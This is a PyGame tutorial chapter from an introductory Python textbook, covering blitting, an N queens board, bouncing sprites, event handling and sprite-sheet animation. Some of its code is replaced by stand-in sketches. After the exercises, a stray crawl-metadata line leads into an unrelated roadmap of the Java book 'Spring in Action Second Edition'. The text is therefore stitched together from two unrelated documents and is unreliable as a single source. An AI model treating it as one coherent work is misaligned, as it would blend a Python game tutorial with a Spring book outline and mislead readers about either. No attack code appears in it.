small_rect, a 4-element tuple
(x, y, width, height).
- It is important to understand that the origin of PyGame’s surface is at the top left corner (unlike the turtle module that puts its origin in the middle of the screen). So, if you wanted the rectangle closer to the top of the window, you need to make its y coordinate smaller.
- If your graphics display hardware tries to read from memory at the same time as the program is writing to that memory, they will interfere with each other, causing video noise and flicker. To get around this, PyGame keeps two buffers in the main surface — the back buffer that the program draws to, while the front buffer is being shown to the user. Each time the program has fully prepared its back buffer, it flips the back/front role of the two buffers. So the drawing on lines 24 and 27 does not change what is seen on the screen until we flip the buffers, on line 30.
17.2. Displaying images and text
To draw an image on the main surface, we load the
image, say a beach ball, into its own new surface.
The main surface has a
blit method that copies
pixels from the beach ball surface into its
own surface. When we call
blit, we can specify where the beach ball should be placed
on the main surface. The term blit is widely used in computer graphics, and means
to make a fast copy of pixels from one area of memory to another.
So in the setup section, before we enter the game loop, we’d load the image, like this:
and after line 28 in the program above, we’d add this code to display our image at position (100,120):
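Taken together, the two fragments look like the sketch below. The chapter loads a real image with pygame.image.load("ball.png"); here a plain yellow surface stands in for it, so the sketch runs anywhere, and a plain Surface stands in for the display surface.

```python
import pygame

# In the setup section: load the image into its own surface.
# (Stand-in for: ball = pygame.image.load("ball.png"))
ball = pygame.Surface((50, 50))
ball.fill((255, 255, 0))

main_surface = pygame.Surface((480, 480))   # stand-in for the display surface

# In the game loop, after drawing the background:
main_surface.blit(ball, (100, 120))         # copy the ball's pixels to (x=100, y=120)
```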
To display text, we need to do three things. Before we enter the game loop, we
instantiate a
font object:
and after line 28, again, we use the font’s
render method to create a new surface
containing the pixels of the drawn text,
and then, as in the case for images, we blit
our new surface onto the main surface. Notice that render takes two extra parameters — the first tells it whether to carefully smooth the edges of the text while drawing (this process is called anti-aliasing), and the second is the color that we want the text to be. Here we’ve used (0,0,0), which is black:
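A sketch of all three steps follows. The font name, size, and sample string are illustrative choices, and a plain Surface again stands in for the display surface.

```python
import pygame

pygame.font.init()   # pygame.init() in the full program does this for us

# Before the game loop: instantiate a font object.
my_font = pygame.font.SysFont("Courier", 16)

# In the game loop: render the text into its own new surface ...
the_text = my_font.render("Hello, world!", True, (0, 0, 0))

# ... and blit that surface onto the main surface, as we did for images.
main_surface = pygame.Surface((480, 480))
main_surface.fill((255, 255, 255))
main_surface.blit(the_text, (10, 10))
```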
We’ll demonstrate these two new features by counting the frames — the iterations of the game loop — and keeping some timing information. On each frame, we’ll display the frame count, and the frame rate. We will only update the frame rate after every 500 frames, when we’ll look at the timing interval and can do the calculations.
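The drawing parts of that demonstration follow the pattern shown above; the counting and timing logic on its own can be sketched pygame-free like this (the fixed 1500 iterations simply stand in for the game loop):

```python
import time

frame_count = 0
frame_rate = 0.0
t0 = time.perf_counter()

for _ in range(1500):                 # stands in for iterations of the game loop
    frame_count += 1
    if frame_count % 500 == 0:        # only recompute the rate every 500 frames
        t1 = time.perf_counter()
        frame_rate = 500 / (t1 - t0)  # frames per second over the last interval
        t0 = t1
```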
The frame rate is close to ridiculous — a lot faster than one’s eye can process frames. (Commercial video games usually plan their action for 60 frames per second (fps).) Of course, our rate will drop once we start doing something a little more strenuous inside our game loop.
17.3. Drawing a board for the N queens puzzle
We previously solved our N queens puzzle.
For the 8x8 board, one of the solutions was the list
[6,4,2,0,5,7,1,3].
Let’s use that solution as testdata, and now use PyGame to draw that
chessboard with its queens.
We’ll create a new module for the drawing code, called
draw_queens.py. When
we have our test case(s) working, we can go back to our solver, import this new module,
and add a call to our new function to draw a board each time a solution is discovered.
We begin with a background of black and red squares for the board. Perhaps we could create an image that we could load and draw, but that approach would need different background images for different size boards. Just drawing our own red and black rectangles of the appropriate size sounds like much more fun!
Here we precompute
sq_sz, the integer
size that each square will be, so that we can fit the squares
nicely into the available window. So if
we’d like the board to be 480x480, and we’re drawing an 8x8
chessboard, then each square will need
to have a size of 60 units. But we
notice that a 7x7 board cannot
fit nicely into 480 — we’re going to
get some ugly border that our squares don’t fill exactly.
So we recompute the surface size to exactly
fit our squares before we create the window.
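As a sketch, the size calculation (here for a 7x7 board) goes like this:

```python
n = 7                        # number of squares on each side of the board
surface_sz = 480             # the size we would like the window to be
sq_sz = surface_sz // n      # integer size of each square: 480 // 7 == 68
surface_sz = n * sq_sz       # recompute so the squares fit exactly: 7 * 68 == 476
```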
Now let’s draw the squares, in the game loop. We’ll need a nested loop: the outer loop will run over the rows of the chessboard, the inner loop over the columns:
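Here is a self-contained sketch of the nested loop (a plain Surface stands in for the display surface, and the loop would sit inside the game loop so the background is redrawn every frame):

```python
import pygame

n = 8
sq_sz = 60
surface = pygame.Surface((n * sq_sz, n * sq_sz))
colors = [(255, 0, 0), (0, 0, 0)]       # the two square colors: red and black

for row in range(n):                    # the outer loop runs over the rows
    c_indx = row % 2                    # each row starts on the other color
    for col in range(n):                # the inner loop runs over the columns
        the_square = (col * sq_sz, row * sq_sz, sq_sz, sq_sz)
        surface.fill(colors[c_indx], the_square)
        c_indx = (c_indx + 1) % 2       # switch color after every square
```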
There are two important ideas in this code: firstly,
we compute the rectangle to be filled
from the
row and
col loop variables,
multiplying them by the size of the square to
get their position. And, of course, each
square is a fixed width and height. So
the_square
represents the rectangle to be filled on the
current iteration of the loop. The second idea
is that we have to alternate colors on
every square. In the earlier setup code we created
a list containing two colors, here we
manipulate
c_indx (which will always either have
the value 0 or 1) to start each row on a
color that is different from the previous row’s
starting color, and to switch colors each
time a square is filled.
This (together with the other fragments not shown, which flip the surface onto the display) leads to pleasing backgrounds like these, for different size boards:
Now, on to drawing the queens! Recall that our
solution
[6,4,2,0,5,7,1,3] means that
in column 0 of the board we want a queen at
row 6, at column 1 we want a queen at row 4,
and so on. So we need a loop running over each queen:
In this chapter we already have a beach ball image, so we’ll use that for our queens. In the setup code before our game loop, we load the ball image (as we did before), and in the body of the loop, we add the line:
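In sketch form, with a plain surface standing in for the loaded ball image, the loop and its blit line look like this:

```python
import pygame

the_solution = [6, 4, 2, 0, 5, 7, 1, 3]
sq_sz = 60
surface = pygame.Surface((8 * sq_sz, 8 * sq_sz))

# Stand-in for ball = pygame.image.load("ball.png") from the setup section.
ball = pygame.Surface((50, 50))
ball.fill((200, 200, 0))

# One iteration per queen: the column index and the row the queen occupies.
for (col, row) in enumerate(the_solution):
    surface.blit(ball, (col * sq_sz, row * sq_sz))
```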
We’re getting there, but those queens need to be centred in their squares! Our problem arises from the fact that both the ball and the rectangle have their upper left corner as their reference points. If we’re going to centre this ball in the square, we need to give it an extra offset in both the x and y direction. (Since the ball is round and the square is square, the offset in the two directions will be the same, so we’ll just compute a single offset value, and use it in both directions.)
The offset we need is half the (size of the square less the size of the ball). So we’ll precompute this in the game’s setup section, after we’ve loaded the ball and determined the square size:
Now we touch up the drawing code for the ball and we’re done:
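A sketch of both pieces together, again with stand-in surfaces (the 50-pixel ball size is an assumption, giving an offset of 5):

```python
import pygame

the_solution = [6, 4, 2, 0, 5, 7, 1, 3]
sq_sz = 60
surface = pygame.Surface((8 * sq_sz, 8 * sq_sz))
ball = pygame.Surface((50, 50))     # stand-in for the loaded beach-ball image
ball.fill((200, 200, 0))

# Setup section: precompute the offset that centres the ball in its square.
ball_offset = (sq_sz - ball.get_width()) // 2

# Drawing code: add the offset in both the x and y directions.
for (col, row) in enumerate(the_solution):
    surface.blit(ball, (col * sq_sz + ball_offset, row * sq_sz + ball_offset))
```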
We might just want to think about what would happen if the ball was bigger than
the square. In that case,
ball_offset would become negative.
So it would still be centred in the square - it would just spill
over the boundaries, or perhaps obscure the square entirely!
Here is the complete program:
There is one more thing worth reviewing here. The conditional statement on line
50 tests whether the name of the currently executing program is
__main__.
This allows us to distinguish whether this module is being run as a main program,
or whether it has been imported elsewhere, and used as a module. If we run this
module in Python, the test cases in lines 51-54 will be executed. However, if we
import this module into another program (i.e. our N queens solver from earlier)
the condition at line 50 will be false, and the statements on lines 51-54 won’t run.
In the section Eight Queens puzzle, part 2 our main program looked like this:
Now we just need two changes. At the top of that program, we
import the module that we’ve been working on here (assume we
called it
draw_queens). (You’ll have to ensure that the
two modules are saved in the same folder.) Then after line 10
here we add a call to draw the solution that we’ve just discovered:
draw_queens.draw_board(bd)
And that gives a very satisfying result: a program that can search for solutions to the N queens problem and, each time it finds one, pops up the board showing the solution.
17.4. Sprites
A sprite is an object that can move about in a game, and has internal behaviour and state of its own. For example, a spaceship would be a sprite, the player would be a sprite, and bullets and bombs would all be sprites.
Object oriented programming (OOP) is ideally suited to a situation like this: each object can have its own attributes and internal state, and a couple of methods. Let’s have some fun with our N queens board. Instead of placing the queen in her final position, we’d like to drop her in from the top of the board, and let her fall into position, perhaps bouncing along the way.
The first encapsulation we need is to turn each of our queens into an object. We’ll keep a list of all the active sprites (i.e. a list of queen objects), and arrange two new things in our game loop:
- After handling events, but before drawing, call an update method on every sprite. This will give each sprite a chance to modify its internal state in some way — perhaps change its image, or change its position, or rotate itself, or make itself grow a bit bigger or a bit smaller.
- Once all the sprites have updated themselves, the game loop can begin drawing - first the background, and then it calls a draw method on each sprite in turn, delegating (handing off) the task of drawing to the object itself. This is in line with the OOP idea that we don’t say “Hey, draw, show this queen!”, but we prefer to say “Hey, queen, draw yourself!”.
We start with a simple object, no movement or animation yet, just scaffolding, to see how to fit all the pieces together:
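A scaffold along those lines, in pure Python (the attribute names here are one reasonable choice):

```python
class QueenSprite:

    def __init__(self, img, target_posn):
        """Create a sprite with an image, a target position,
           and a current position (initially the same as the target)."""
        self.image = img
        self.target_posn = target_posn
        self.posn = target_posn

    def update(self):
        pass                      # nothing moves, yet

    def draw(self, target_surface):
        # "Hey, queen, draw yourself!": blit at the current position.
        target_surface.blit(self.image, self.posn)
```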
We’ve given the sprite three attributes: an image to be drawn,
a target position, and a current position. If we’re going to
move the spite about, the current position may need to be
different from the target, which is where we want the queen
finally to end up. At this stage we’ve done nothing
in the
update method, and our
draw method (which
can probably remain this simple in future) simply draws itself
at its current position on the surface that is provided
by the caller.
With its class definition in place, we now instantiate our N queens,
put them into a list of sprites, and arrange for the game loop to call
the
update and
draw methods on each frame. The new bits of
code, and the revised game loop look like this:
This works just like it did before, but our extra work in making objects for the queens has prepared the way for some more ambitious extensions.
Let us begin with a falling queen object. At any instant, it will have a
velocity, i.e. a speed in a certain direction.
(We are only working with movement in the y direction, but use your imagination!)
So in the object’s
update method, we want to change its current position by its velocity.
If our N queens board is floating in space, velocity would stay constant, but hey, here on
Earth we have gravity! Gravity changes the velocity on each time interval, so we’ll want a ball
that speeds up as it falls further. Gravity will be constant for all queens, so we won’t keep
it in the instances — we’ll just make it a variable in our module. We’ll make one other
change too: we will start every queen at the top of the board, so that it can fall towards
its target position. With these changes, we now get the following:
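A sketch of the changed class (the gravity value is an illustrative guess for the fast, uncapped frame rate; draw is unchanged):

```python
gravity = 0.0001      # shared by every queen, so it lives at module level

class QueenSprite:

    def __init__(self, img, target_posn):
        self.image = img
        self.target_posn = target_posn
        (x, y) = target_posn
        self.posn = (x, 0)        # start at the top of the column ...
        self.y_velocity = 0       # ... with no speed

    def update(self):
        self.y_velocity += gravity          # gravity changes the velocity,
        (x, y) = self.posn
        new_y_pos = y + self.y_velocity     # and the velocity moves the queen
        self.posn = (x, new_y_pos)

    def draw(self, target_surface):
        target_surface.blit(self.image, self.posn)
```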
Making these changes gives us a new chessboard in which each queen starts at the top of its column, and speeds up, until it drops off the bottom of the board and disappears forever. A good start — we have movement!
The next step is to get the ball to bounce when it reaches its own target position. It is pretty easy to bounce something — you just change the sign of its velocity, and it will move at the same speed in the opposite direction. Of course, if it is travelling up towards the top of the board it will be slowed down by gravity. (Gravity always sucks down!) And you’ll find it bounces all the way up to where it began from, reaches zero velocity, and starts falling all over again. So we’ll have bouncing balls that never settle.
A realistic way to settle the object is to lose some energy (probably to friction) each time it bounces — so instead of simply reversing the sign of the velocity, we multiply it by some fractional factor — say -0.65. This means the ball only retains 65% of its speed on each bounce (and less than half of its energy), so it will, as in real life, stop bouncing after a short while, and settle on its “ground”.
The only changes are in the
update method, which now looks like this:
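Shown in the context of the whole class so the sketch stands alone (0.65 is the fraction of the speed kept on each bounce, and gravity is the same illustrative value as before):

```python
gravity = 0.0001

class QueenSprite:

    def __init__(self, img, target_posn):
        self.image = img
        self.target_posn = target_posn
        (x, y) = target_posn
        self.posn = (x, 0)
        self.y_velocity = 0

    def update(self):
        self.y_velocity += gravity              # gravity still sucks down
        (x, y) = self.posn
        new_y_pos = y + self.y_velocity
        (target_x, target_y) = self.target_posn
        dist_to_go = target_y - new_y_pos       # how far to our floor?

        if dist_to_go < 0:                      # if we would pass the floor,
            self.y_velocity = -0.65 * self.y_velocity  # reverse, keeping 65% of the speed,
            new_y_pos = target_y + 0.65 * dist_to_go   # and bounce back above the floor

        self.posn = (x, new_y_pos)
```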
Heh, heh, heh! We’re not going to show animated screenshots, so copy the code into your Python environment and see for yourself.
17.5. Events
The only kind of event we’ve handled so far has been the QUIT event. But we can also detect keydown and keyup events, mouse motion, and mousebutton down or up events. Consult the PyGame documentation and follow the link to Event.
When your program polls for and receives an event object from PyGame, its event type will determine what secondary information is available. Each event object carries a dictionary (which you may only cover in due course in these notes). The dictionary holds certain keys and values that make sense for the type of event.
For example, if the type of event is MOUSEMOTION, we’ll be able to find the mouse position and information about the state of the mouse buttons in the dictionary attached to the event. Similarly, if the event is KEYDOWN, we can learn from the dictionary which key went down, and whether any modifier keys (shift, control, alt, etc.) are also down. You also get events when the game window becomes active (i.e. gets focus) or loses focus.
The event object with type NOEVENT is returned if there are no events waiting. Events can be printed, allowing you to experiment and play around. So dropping these lines of code into the game loop directly after polling for any event is quite informative:
With this is place, hit the space bar and the escape key, and watch the events you get. Click your three mouse buttons. Move your mouse over the window. (This causes a vast cascade of events, so you may also need to filter those out of the printing.) You’ll get output that looks something like this:
<Event(17-VideoExpose {})>
<Event(1-ActiveEvent {'state': 1, 'gain': 0})>
<Event(2-KeyDown {'scancode': 57, 'key': 32, 'unicode': ' ', 'mod': 0})>
<Event(3-KeyUp {'scancode': 57, 'key': 32, 'mod': 0})>
<Event(2-KeyDown {'scancode': 1, 'key': 27, 'unicode': '\x1b', 'mod': 0})>
<Event(3-KeyUp {'scancode': 1, 'key': 27, 'mod': 0})>
...
<Event(4-MouseMotion {'buttons': (0, 0, 0), 'pos': (323, 194), 'rel': (-3, -1)})>
<Event(4-MouseMotion {'buttons': (0, 0, 0), 'pos': (322, 193), 'rel': (-1, -1)})>
<Event(4-MouseMotion {'buttons': (0, 0, 0), 'pos': (321, 192), 'rel': (-1, -1)})>
<Event(4-MouseMotion {'buttons': (0, 0, 0), 'pos': (319, 192), 'rel': (-2, 0)})>
<Event(5-MouseButtonDown {'button': 1, 'pos': (319, 192)})>
<Event(6-MouseButtonUp {'button': 1, 'pos': (319, 192)})>
<Event(4-MouseMotion {'buttons': (0, 0, 0), 'pos': (319, 191), 'rel': (0, -1)})>
<Event(5-MouseButtonDown {'button': 2, 'pos': (319, 191)})>
<Event(5-MouseButtonDown {'button': 5, 'pos': (319, 191)})>
<Event(6-MouseButtonUp {'button': 5, 'pos': (319, 191)})>
<Event(6-MouseButtonUp {'button': 2, 'pos': (319, 191)})>
<Event(5-MouseButtonDown {'button': 3, 'pos': (319, 191)})>
<Event(6-MouseButtonUp {'button': 3, 'pos': (319, 191)})>
...
<Event(1-ActiveEvent {'state': 1, 'gain': 0})>
<Event(12-Quit {})>
So let us now make these changes to the code near the top of our game loop:
Lines 7-16 show typical processing for a KEYDOWN event — if a key has gone down, we test which key it is, and take some action. With this in place, we have another way to quit our queens program — by hitting the escape key. Also, we can use keys to change the color of the board that is drawn.
Finally, at line 20, we respond (pretty lamely) to the mouse button going down.
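The handling described can be sketched as a helper function (a sketch of the idea, not the original numbered listing; the r, g, and b color keys are illustrative choices):

```python
import pygame

def handle_event(ev, colors):
    """Respond to one polled event; return False when the game should end.

    colors is the list of two board colors; pressing r, g, or b
    changes the first of them."""
    if ev.type == pygame.QUIT:
        return False
    if ev.type == pygame.KEYDOWN:
        key = ev.dict["key"]
        if key == pygame.K_ESCAPE:      # the escape key also quits
            return False
        if key == pygame.K_r:
            colors[0] = (255, 0, 0)
        elif key == pygame.K_g:
            colors[0] = (0, 255, 0)
        elif key == pygame.K_b:
            colors[0] = (0, 0, 255)
    if ev.type == pygame.MOUSEBUTTONDOWN:
        print("The mouse button went down!")   # a pretty lame response, for now
    return True
```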
As a final exercise in this section, we’ll write a better response handler to mouse clicks. What we will do is figure out if the user has clicked the mouse on one of our sprites. If there is a sprite under the mouse when the click occurs, we’ll send the click to the sprite and let it respond in some sensible way.
We’ll begin with some code that finds out which sprite is under the clicked position, perhaps none!
We add a method to the class,
contains_point, which returns True if the point is within
the rectangle of the sprite:
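On a minimal version of the sprite class (the image object provides its own width and height), the method can look like this:

```python
class QueenSprite:
    """Just enough of the sprite class to demonstrate hit-testing."""

    def __init__(self, img, posn):
        self.image = img
        self.posn = posn

    def contains_point(self, pt):
        """Return True if the point pt falls within my rectangle."""
        (my_x, my_y) = self.posn
        my_width = self.image.get_width()
        my_height = self.image.get_height()
        (x, y) = pt
        return (my_x <= x < my_x + my_width and
                my_y <= y < my_y + my_height)
```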
Now in the game loop, once we’ve seen the mouse event, we determine which queen, if any, should be told to respond to the event:
And the final thing is to write a new method called
handle_click in the
QueenSprite class.
When a sprite is clicked, we’ll just add some velocity in the up direction,
i.e. kick it back into the air.
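Combined into a sketch (the contains_point stub here always answers yes so the fragment stands alone, and the kick value of -0.3 is a guess you will want to tune for your own frame rate):

```python
def dispatch_click(posn_of_click, all_sprites):
    """Give the click to the first sprite under it, if there is one."""
    for sprite in all_sprites:
        if sprite.contains_point(posn_of_click):
            sprite.handle_click()
            break

# In the game loop, after polling, this would be driven by:
#   if ev.type == pygame.MOUSEBUTTONDOWN:
#       dispatch_click(ev.dict["pos"], all_sprites)

class QueenSprite:
    """Just the parts needed to show the new click handler."""

    def __init__(self):
        self.y_velocity = 0

    def contains_point(self, pt):
        return True                # stub: a real sprite tests its rectangle

    def handle_click(self):
        self.y_velocity += -0.3    # kick the ball back into the air
```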
With these changes we have a playable game! See if you can keep all the balls on the move, not allowing any one to settle!
17.6. A wave of animation
Many games have sprites that are animated: they crouch, jump and shoot. How do they do that?
Consider this sequence of 10 images: if we display them in quick succession, Duke will wave at us. (Duke is a friendly visitor from the kingdom of Javaland.)
A compound image containing smaller patches which are intended for animation is
called a sprite sheet. Download this sprite sheet by right-clicking in your browser
and saving it in your working directory with the name
duke_spritesheet.png.
The sprite sheet has been quite carefully prepared: each of the 10 patches are spaced exactly 50 pixels apart. So, assuming we want to draw patch number 4 (numbering from 0), we want to draw only the rectangle that starts at x position 200, and is 50 pixels wide, within the sprite sheet. Here we’ve shown the patches and highlighted the patch we want to draw.
The
blit method we’ve been using — for copying pixels from one surface to another —
can copy a sub-rectangle of the source surface. So the grand idea here is that
each time we draw Duke, we won’t blit the whole sprite sheet. Instead we’ll provide an extra
rectangle argument that determines which portion of the sprite sheet will be blitted.
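The idea can be sketched with surfaces built in code (a real program would pygame.image.load("duke_spritesheet.png") instead; here each 50-pixel patch of the stand-in sheet gets its own shade so we can see which one was blitted):

```python
import pygame

sprite_sheet = pygame.Surface((500, 50))        # stand-in for the sprite sheet
for i in range(10):
    sprite_sheet.fill((i * 25, 0, 0), (i * 50, 0, 50, 50))

main_surface = pygame.Surface((480, 480))

curr_patch_num = 4
patch_rect = (curr_patch_num * 50, 0, 50, 50)   # sub-rectangle of the sheet

# The third argument tells blit to copy only that patch of the source.
main_surface.blit(sprite_sheet, (10, 10), patch_rect)
```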
We’re going to add new code in this section to our existing N queens drawing game. What we want is to put some instances of Duke on the chessboard somewhere. If the user clicks on one of them, we’ll get him to respond by waving back, for one cycle of his animation.
But before we do that, we need another change. Up until now, our game loop has been running at really fast frame rates that are unpredictable. So we’ve chosen some magic numbers for gravity and for bouncing and kicking the ball on the basis of trial-and-error. If we’re going to start animating more sprites, we need to tame our game loop to operate at a fixed, known frame rate. This will allow us to plan our animation better.
PyGame gives us the tools to do this in just two lines of code. In the setup section of
the game, we instantiate a new
Clock object:
and right at the bottom of the game loop, we call a method on this object that limits the frame rate to whatever we specify. So let’s plan our game and animation for 60 frames per second, by adding this line at the bottom of our game loop:
You’ll find that you have to go back and adjust the numbers for gravity and kicking the ball now, to match this much slower frame rate. When we plan an animation so that it only works sensibly at a fixed frame rate, we say that we’ve baked the animation. In this case we’re baking our animations for 60 frames per second.
To fit into the existing framework that we
already have for our queens board, we want to create
a
DukeSprite class that has all the same
methods as the
QueenSprite class. Then we can
add one or more Duke instances onto our list of
all_sprites, and our existing game loop will then
call methods of the Duke instance. Let us start with
skeleton scaffolding for the new class:
The only changes we’ll need to the existing game are all in the setup section. We load up the new sprite sheet and instantiate a couple of instances of Duke, at the positions we want on the chessboard. So before entering the game loop, we add this code:
Now the game loop will test if each instance has been clicked, will call
the click handler for that instance. It will also call update and draw for all sprites.
All the remaining changes we need to make will be made in the methods of the
DukeSprite class.
Let’s begin with drawing one of the patches. We’ll introduce a new attribute
curr_patch_num
into the class. It holds a value between 0 and 9, and determines which patch to draw. So
the job of the
draw method is to compute the sub-rectangle of the patch to be drawn, and
to blit only that portion of the spritesheet:
Now on to getting the animation to work. We need to arrange logic in
update
so that if we’re busy animating, we change the
curr_patch_num every so
often, and we also decide when to bring Duke back to his rest position, and
stop the animation. An important issue is that the game loop frame rate —
in our case 60 fps — is not the same as the animation rate —
the rate at which we want to change
Duke’s animation patches. So we’ll plan Duke wave’s animation cycle
for a duration of 1 second. In other words, we want to play out Duke’s
10 animation patches over 60 calls to
update. (This is how the baking
of the animation takes place!) So we’ll keep another animation frame
counter in the class, which will be zero when we’re not animating, and
each call to
update will increment the counter up to 59, and then
back to 0. We can then divide that animation counter by 6, to set the
curr_patch_num variable to select the patch we want to show.
Notice that if
anim_frame_count is zero, i.e. Duke is at rest, nothing
happens here. But if we start the counter running, it will count up
to 59 before settling back to zero. Notice also, that because
anim_frame_count
can only be a value between 0 and 59, the
curr_patch_num will
always stay between 0 and 9. Just what we require!
Now how do we trigger the animation, and start it running? On the mouse click.
Two things of interest here. We only start the animation if Duke is at rest.
Clicks on Duke while he is already waving get ignored. And when we do start the
animation, we set the counter to 5 — this means that on the very next call to
update the counter becomes 6, and the image changes. If
we had set the counter to 1, we would have needed to wait for 5 more calls to
update before anything happened — a slight lag, but enough to make things
feel sluggish.
The final touch-up is to initialize our two new attributes when we instantiate the class. Here is the code for the whole class now:
Now we have two extra Duke instances on our chessboard, and clicking on either causes that instance to wave.
17.7. Aliens - a case study¶
Find the example games with the PyGame package, (On a windows system, something like C:\Python3\Lib\site-packages\pygame\examples) and play the Aliens game. Then read the code, in an editor or Python environment that shows line numbers.
It does a number of much more advanced things that we do, and relies on the PyGame framework for more of its logic. Here are some of the points to notice:
- The frame rate is deliberately constrained near the bottom of the game loop at line 311. If we change that number we can make the game very slow or unplayably fast!
- There are different kinds of sprites: Explosions, Shots, Bombs, Aliens and a Player. Some of these have more than one image — by swapping the images, we get animation of the sprites, i.e. the Alien spacecraft lights change, and this is done at line 112.
- Different kinds of objects are referenced in different groups of sprites, and PyGame helps maintain these. This lets the program check for collisions between, say, the list of shots fired by the player, and the list of spaceships that are attacking. PyGame does a lot of the hard work for us.
- Unlike our game, objects in the Aliens game have a limited lifetime, and have to get killed. For example, if we shoot, a Shot object is created — if it reaches the top of the screen without expoding against anything, it has to be removed from the game. Lines 141-142 do this. Similarly, when a falling bomb gets close to the ground (line 156), it instantiates a new Explosion sprite, and the bomb kills itself.
- There are random timings that add to the fun — when to spawn the next Alien, when an Alien drops the next bomb, etc.
- The game plays sounds too: a less-than-relaxing loop sound, plus sounds for the shots and explosions.
17.8. Reflections¶
Object oriented programming is a good organizational tool for software. In the examples in this chapter, we’ve started to use (and hopefully appreciate) these benefits. Here we had N queens each with its own state, falling to its own floor level, bouncing, getting kicked, etc. We might have managed without the organizational power of objects — perhaps we could have kept lists of velocities for each queen, and lists of target positions, and so on — our code would likely have been much more complicated, ugly, and a lot poorer!
17.9. Glossary¶
- animation rate
- The rate at which we play back successive patches to create the illusion of movement. In the sample we considered in this chapter, we played Duke’s 10 patches over the duration of one second. Not the same as the frame rate.
- baked animation
- An animation that is designed to look good at a predetermined fixed frame rate. This reduces the amount of computation that needs to be done when the game is running. High-end commercial games usually bake their animations.
- blit
- A verb used in computer graphics, meaning to make a fast copy of an image or pixels from a sub-rectangle of one image or surface to another surface or image.
- frame rate
- The rate at which the game loop executes and updates the display.
- game loop
- A loop that drives the logic of a game. It will usually poll for events, then update each of the objects in the game, then get everything drawn, and then put the newly drawn frame on display.
- pixel
- A single picture element, or dot, from which images are made.
- poll
- To ask whether something like a keypress or mouse movement has happened. Game loops usually poll to discover what events have occurred. This is different from event-driven programs like the ones seen in the chapter titled “Events”. In those cases, the button click or keypress event triggers the call of a handler function in your program, but this happens behind your back.
- sprite
- An active agent or element in a game, with its own state, position and behaviour.
- surface
- This is PyGame’s term for what the Turtle module calls a canvas. A surface is a rectangle of pixels used for displaying shapes and images.
17.10. Exercises¶
- Have fun with Python, and with PyGame.
- We deliberately left a bug in the code for animating Duke. If you click on one of the chessboard squares to the right of Duke, he waves anyway. Why? Find a one-line fix for the bug.
- Use your preferred search engine to search their image library for “sprite sheet playing cards”. Create a list [0..51] to represent an encoding of the 52 cards in a deck. Shuffle the cards, slice off the top five as your hand in a poker deal. Display the hand you have been dealt.
- So the Aliens game is in outer space, without gravity. Shots fly away forever, and bombs don’t speed up when they fall. Add some gravity to the game. Decide if you’re going to allow your own shots to fall back on your head and kill you.
- Those pesky Aliens seem to pass right through each other! Change the game so that they collide, and destroy each other in a mighty explosion. | http://7-fountains.com/7FD/thinkcspy3/thinkcspy3/pygame.html | CC-MAIN-2018-51 | refinedweb | 5,695 | 76.15 |
Safari Books Online is a digital library providing on-demand subscription access to thousands of learning resources.
The Spring Framework was created with a very specific goal in mind—to make developing JEE applications easier. Along the same lines, Spring in Action was written to make learning how to use Spring easier. My goal is not to give you a blow-by-blow listing of Spring APIs. Instead, I hope to present the Spring Framework in a way that is most relevant to a JEE. That way, the book can act as a tool for learning Spring for the first time as well as a guide and reference for those wanting to dig deeper into specific features.
Spring in Action Second Edition is divided into three parts, plus two appendices. Each of the three parts focuses on a general area of the Spring Framework: the core framework, the business and data layers, and the presentation layer. While each part builds on the previous section, each is also able to stand on its own, allowing you to dive right into a certain topic without starting from the beginning.
In part 1, you’ll explore the two core features of the Spring framework: dependency injection (DI) and aspect-oriented programming (AOP). This will give you a good understanding of Spring’s fundamentals that will be utilized throughout the book.
In chapter 1, you’ll be introduced to DI and AOP and how they lend themselves to developing loosely coupled Java applications.
Chapter 2 takes a more detailed look at how to configure and associate your application objects using dependency injection. You will learn how to write loosely coupled components and wire their dependencies and properties within the Spring container using XML.
Once you’ve got the basics of bean wiring down, you’ll be ready to look at some of the more advanced features of the Spring container in chapter 3. Among other things, you’ll learn how to hook into the lifecycle of your application components, create parent/child relationships among your bean configurations, and wire in scripted components written in Ruby and Groovy.
Chapter 4 explores how to use Spring’s AOP to decouple cross-cutting concerns from the objects that they service. This chapter also sets the stage for later chapters, where you’ll use Spring AOP to provide declarative services such as transactions, security, and caching.
Part 2 builds on the DI and AOP features introduced in part 1 and shows you how to apply these concepts in the data and business tiers of your application.
Chapter 5 covers Spring’s support for data persistence. You’ll be introduced to Spring’s JDBC support, which helps you remove much of the boilerplate code associated with JDBC. You’ll also see how Spring integrates with several popular persistence frameworks such as Hibernate, iBATIS, and the Java Persistence API (JPA).
Chapter 6 complements chapter 5, showing you how to ensure integrity in your database using Spring’s transaction support. You will see how Spring uses AOP to give simple application objects the power of declarative transactions.
In chapter 7 you will learn how to apply security to your application using Spring Security. You’ll see how Spring Security secures application both at the web request level using servlet filters and at the method level using Spring AOP.
Chapter 8 explores how to expose your application objects as remote services. You’ll also learn how to seamlessly access remote services as though they were any other object in your application. Remoting technologies explored will include RMI, Hessian/Burlap, SOAP-based web services, and Spring’s own HttpInvoker.
Although chapter 8 covers web services in Spring, chapter 9 takes a different look at web services by examining the Spring-WS project. In this chapter, you’ll learn how to use Spring-WS to build contract-first web services, in which the service’s contract is decoupled from its implementation.
Chapter 10 looks at using Spring to send and receive asynchronous messages with JMS. In addition to basic JMS operations with Spring, you’ll also learn how to using the open source Lingo project to expose and consume asynchronous remote services over JMS.
Even though Spring eliminates much of the need for EJBs, you may have a need to use both Spring and EJB together. Therefore, chapter 11 explores how to integrate Spring with EJB. You’ll learn how to write Spring-enabled EJBs, how to wire EJB references into your Spring application context, and even how to use EJB-like annotations to configure your Spring beans.
Wrapping up part 2, chapter 12 will show you how to use Spring to schedule jobs, send e-mails, access JNDI-configured resources, and manage your application objects with JMX.
Part 3 moves the discussion of Spring a little closer to the end user by looking at the ways to use Spring to build web applications.
Chapter 13 introduces you to Spring’s own MVC web framework. You will discover how Spring can transparently bind web parameters to your business objects and provide validation and error handling at the same time. You will also see how easy it is to add functionality to your web applications using Spring’s rich selection of controllers.
Picking up where chapter 13 leaves off, chapter 14 covers the view layer of Spring MVC. In this chapter, you’ll learn how to map the output of a Spring MVC controller to a specific view component for rendering to the user. You’ll see how to define application views using JSP, Velocity, FreeMarker, and Tiles. And you’ll learn how to create non-HTML output such as PDF, Excel, and RSS from Spring MVC.
Chapter 15 explores Spring Web Flow, an extension to Spring MVC that enables development of conversational web applications. In this chapter you’ll learn how to build web applications that guide the user through a specific flow.
Finally, chapter 16 shows you how to integrate Spring with other web frameworks. If you already have an investment in another web framework (or just have a preference), this chapter is for you. You’ll see how Spring provides support for several of the most popular web frameworks, including Struts, WebWork, Tapestry, and JavaServer Faces (JSF).
Appendix A will get you started with Spring, showing you how to download Spring and configure Spring in either Ant or Maven 2.
